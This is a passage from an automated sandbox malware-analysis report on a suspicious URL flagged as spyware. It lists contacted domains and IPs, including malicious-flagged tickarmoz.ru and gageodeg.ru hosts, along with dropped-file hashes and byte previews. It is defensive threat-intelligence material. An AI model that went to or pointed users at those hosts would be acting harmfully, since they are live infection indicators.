                                                                                                                                                                                            http://anglebug.com/3584Achrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://anglebug.com/5881cchrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://www.google.com/dl/release2/chrome_component/ac6mhlwypzipnufijdvfyhdgvt4q_67/khaoiebndkojlmppchrome.exe, 00000000.00000002.2433095021.000018A800120000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://anglebug.com/6692chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://issuetracker.google.com/258207403chrome.exe, 00000000.00000002.2467988706.000018A800FA8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                  104.18.94.41
                                                                                                                                                                                                  challenges.cloudflare.comUnited States
                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                  104.21.80.1
                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                  172.67.140.133
                                                                                                                                                                                                  6y.tickarmoz.ruUnited States
                                                                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                                                                  104.21.96.1
                                                                                                                                                                                                  x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ruUnited States
                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                  151.101.194.137
                                                                                                                                                                                                  code.jquery.comUnited States
                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                  35.190.80.1
                                                                                                                                                                                                  a.nel.cloudflare.comUnited States
                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                  104.17.24.14
                                                                                                                                                                                                  cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                  142.250.185.68
                                                                                                                                                                                                  www.google.comUnited States
                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                  104.18.95.41
                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                  151.101.2.137
                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                  239.255.255.250
                                                                                                                                                                                                  unknownReserved
                                                                                                                                                                                                  unknownunknownfalse
                                                                                                                                                                                                  104.17.25.14
                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                  IP
                                                                                                                                                                                                  192.168.2.17
                                                                                                                                                                                                  192.168.2.16
                                                                                                                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                  Analysis ID:1591389
                                                                                                                                                                                                  Start date and time:2025-01-14 23:37:17 +01:00
                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                  Overall analysis duration:0h 4m 48s
                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                  Sample URL:https://6y.tickarmoz.ru/aY57/
                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                  Number of analysed new started processes analysed:21
                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                  Classification:mal72.spyw.win@24/75@34/14
                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, consent.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 142.250.186.35, 142.250.185.174, 64.233.184.84, 142.250.185.142, 142.250.185.206, 142.250.186.78, 199.232.214.172, 20.190.159.0, 20.190.159.75, 20.190.159.4, 40.126.31.69, 40.126.31.73, 20.190.159.71, 40.126.31.71, 20.190.159.73, 13.107.6.156, 142.250.181.238, 142.250.185.238, 142.250.181.234, 142.250.185.138, 142.250.186.170, 142.250.186.74, 142.250.186.42, 172.217.16.138, 142.250.185.106, 216.58.206.42, 142.250.184.234, 172.217.18.10, 216.58.206.74, 142.250.184.202, 142.250.185.74, 172.217.16.202, 142.250.186.138, 142.250.186.106, 20.50.80.209, 51.11.192.48, 172.217.16.206, 216.58.206.78, 172.217.18.110, 142.250.185.163, 142.250.184.206, 2.19.126.89, 2.19.126.84, 142.250.185.110, 2.23.242.162, 184.28.90.27, 4.175.87.197, 13.107.246.45, 13.107.246.64, 40.126.32.138, 20.190.160.17, 204.79.197.200, 40.126.31.67, 23.1.33.206, 204.79.197.222, 150.171.85.254, 150.171.73.254, 150.171.69.254, 150.171.22.254
                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): bx-ring.msedge.net, fp.msedge.net, p-ring.msedge.net, onedscolprdneu02.northeurope.cloudapp.azure.com, afdxtest.z01.azurefd.net, slscr.update.microsoft.com, www.tm.aadcdn.msftauth.trafficmanager.net, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, clients2.google.com, redirector.gvt1.com, login.live.com, r.bing.com, update.googleapis.com, login.mso.msidentity.com, clients1.google.com, www.bing.com, www.tm.ak.prd.aadg.trafficmanager.net, fs.microsoft.com, mcr-ring.msedge.net, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, b-0004.b-msedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, afed493c575e33914867d9dfa75363d0.azr.footprintdns.com, firstparty-azurefd-prod.trafficmanager.net, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ln-ring.msedge.net, onedscolprdfrc01.francecentral.cloudapp.azure.com, www.tm.aadcdn.msftauth.akadns.ne
                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                  • VT rate limit hit for: https://6y.tickarmoz.ru/aY57/
                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                  17:39:47API Interceptor3x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 21:37:46 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2673
                                                                                                                                                                                                  Entropy (8bit):3.988289411802073
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:8MdlTtBikHcidAKZdA1FehwiZUklqehwy+3:8yji/Ly
                                                                                                                                                                                                  MD5:BD4B1DFC1DF6017145B9105C9D7D1F30
                                                                                                                                                                                                  SHA1:C61E623C19A6B6496103BD951DBA0B3117A0D05D
                                                                                                                                                                                                  SHA-256:8843F8D18461AF4B8BFFBF21E53AE183D43909C2E08E4B2254FC9BEAC8FE9FDA
                                                                                                                                                                                                  SHA-512:3A37F078E708BC83D5706FFDC3DFD9F72EFF0E57431BA45C987BFBE48F668427D769151F41293A3DE04F515402631599F9EA9C4D332EDB69D1471C06B8626E23
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,....8]...f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............X.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 21:37:46 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2675
                                                                                                                                                                                                  Entropy (8bit):4.002686826667203
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:8wdlTtBikHcidAKZdA1seh/iZUkAQkqeh7y+2:8ujiJ9QSy
                                                                                                                                                                                                  MD5:AAAE1483779BC6305836879432960231
                                                                                                                                                                                                  SHA1:AB680B08BD32A7DB4483FEE97B7A1078A76F7544
                                                                                                                                                                                                  SHA-256:EF067D1F590D9756C3E13143BAA067034BBC5C96FA7E11083DED21B00521EB97
                                                                                                                                                                                                  SHA-512:AB828E532E8E69BFE68102461DFB12A4DA18DF4E090401127E3A6259235D973FAB6546DBA7F3EE5BBEC1EA4582C09DF51A3DF25BAAE743FFD12D028AC8C1A7D1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....9...f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............X.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2689
                                                                                                                                                                                                  Entropy (8bit):4.0130040859951155
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:8bdlTtBAHcidAKZdA14meh7sFiZUkmgqeh7sly+BX:8/jhnXy
                                                                                                                                                                                                  MD5:39FA9362D3694A39B984397E99F6BE4E
                                                                                                                                                                                                  SHA1:9EA6AFC110C4888C752A50BA7692D718337D6A6E
                                                                                                                                                                                                  SHA-256:D7736A197C583C7C42047E5166D18F783718FE122C14F2FC2D8FD2046F1AFE55
                                                                                                                                                                                                  SHA-512:81F8EB1F80FCAE46538FFC6CB77414B0961F3F4A637E2D34E7782DC5FCAFAB30270B998367E33930560F4669695C63969648019E4E1F27AAEA8F31625F97CC54
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............X.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 21:37:46 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2677
                                                                                                                                                                                                  Entropy (8bit):4.000475871344155
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:8ZdlTtBikHcidAKZdA1TehDiZUkwqehPy+R:8pjiady
                                                                                                                                                                                                  MD5:D6E2B35AE04FC37CEE5A8ACA0BA12013
                                                                                                                                                                                                  SHA1:1BF512A61E0FAC5180BAB5DF81B2850CF5DB1479
                                                                                                                                                                                                  SHA-256:7502F8879D2055FFF13F83BA69A90D82EFD925A938BB479EB83F1664A14C821E
                                                                                                                                                                                                  SHA-512:ADE25C16DB755DC7844ADA91B2D6E2D9A9603032C79E2C3AC3DA52D7B825D43A7E3696E763A0A565DF227247D8B419E15B51DC990259C31ED5698230E90AA9CC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.........f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............X.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 21:37:46 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2677
                                                                                                                                                                                                  Entropy (8bit):3.990027370906473
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:8FdlTtBikHcidAKZdA1dehBiZUk1W1qehRy+C:8Nji69xy
                                                                                                                                                                                                  MD5:3A1D453389F2C9B5B163B77D19173F97
                                                                                                                                                                                                  SHA1:DA521E17B431005E09A989ABCBC3BC755FECDC8C
                                                                                                                                                                                                  SHA-256:8018FAA813062DB925C4F348EEE9305AD1CA000DE706DD5B692977B4FBDBD87E
                                                                                                                                                                                                  SHA-512:2367807B1AA61BA2B83B684E62C894C4DDA4C41AB419B610899361E4AFC493BC67DC4A8948814E0A16ABF0FD32E3202702C360CC86893C6565B473B166C34EF7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....-...f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............X.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 21:37:46 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2679
                                                                                                                                                                                                  Entropy (8bit):4.001480707084305
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:8xdlTtBikHcidAKZdA1duTeehOuTbbiZUk5OjqehOuTbXy+yT+:8xjiQTfTbxWOvTbXy7T
                                                                                                                                                                                                  MD5:1CCFC59317E14DE12D5BF5FB4C95EFB9
                                                                                                                                                                                                  SHA1:FEC3647ED639D5B9B3E07B77B2366C56BAA6783C
                                                                                                                                                                                                  SHA-256:50E0CBA3C31F391AEA212A1A2652B36FA728B659B4CD488D0800683DC8504C7A
                                                                                                                                                                                                  SHA-512:6E1FBED4EAB24E07022FE481C7C8CE9C7EDE749C14F237CAB937EF958E9BF1EC4612FA36D9A9A2A3EA4FD43ECB1C1AE7FA4AEF4FB5CC5533B1D66415BF4F1B54
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....~...f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............X.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (47520)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):47521
                                                                                                                                                                                                  Entropy (8bit):5.3981340461317835
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                                                                                                                                                  MD5:7C92EC9D1395055CE0405A32607C7291
                                                                                                                                                                                                  SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                                                                                                                                                  SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                                                                                                                                                  SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):5525
                                                                                                                                                                                                  Entropy (8bit):7.961202222662501
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                                                                                                                                  MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                                                                                                                                  SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                                                                                                                                  SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                                                                                                                                  SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                                                                                                                                                                  Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):96
                                                                                                                                                                                                  Entropy (8bit):5.218997042938778
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWd6Nk:NciczBdTFsJFoM+q62Nk
                                                                                                                                                                                                  MD5:9872BE83FA60DA999B65A3BD481731D3
                                                                                                                                                                                                  SHA1:B59A8688C6A0D5311C6410A0D91537084E148F2D
                                                                                                                                                                                                  SHA-256:5DEE42A8D755847C0813D4E5F033F51197B20DD3C6C2EE4FBE31FD27B2F593D3
                                                                                                                                                                                                  SHA-512:53E947C87386ECF19E3B36E3F292A9757911F0F8B02FE36DDFC0DD74A3C784D97B15066AB4895EA694F66792A8C7CF525F59A03868FF5D5F0C3B5203D34C5F7D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                                                                                                                                                  Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O348JyJcXRABGP////8P
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
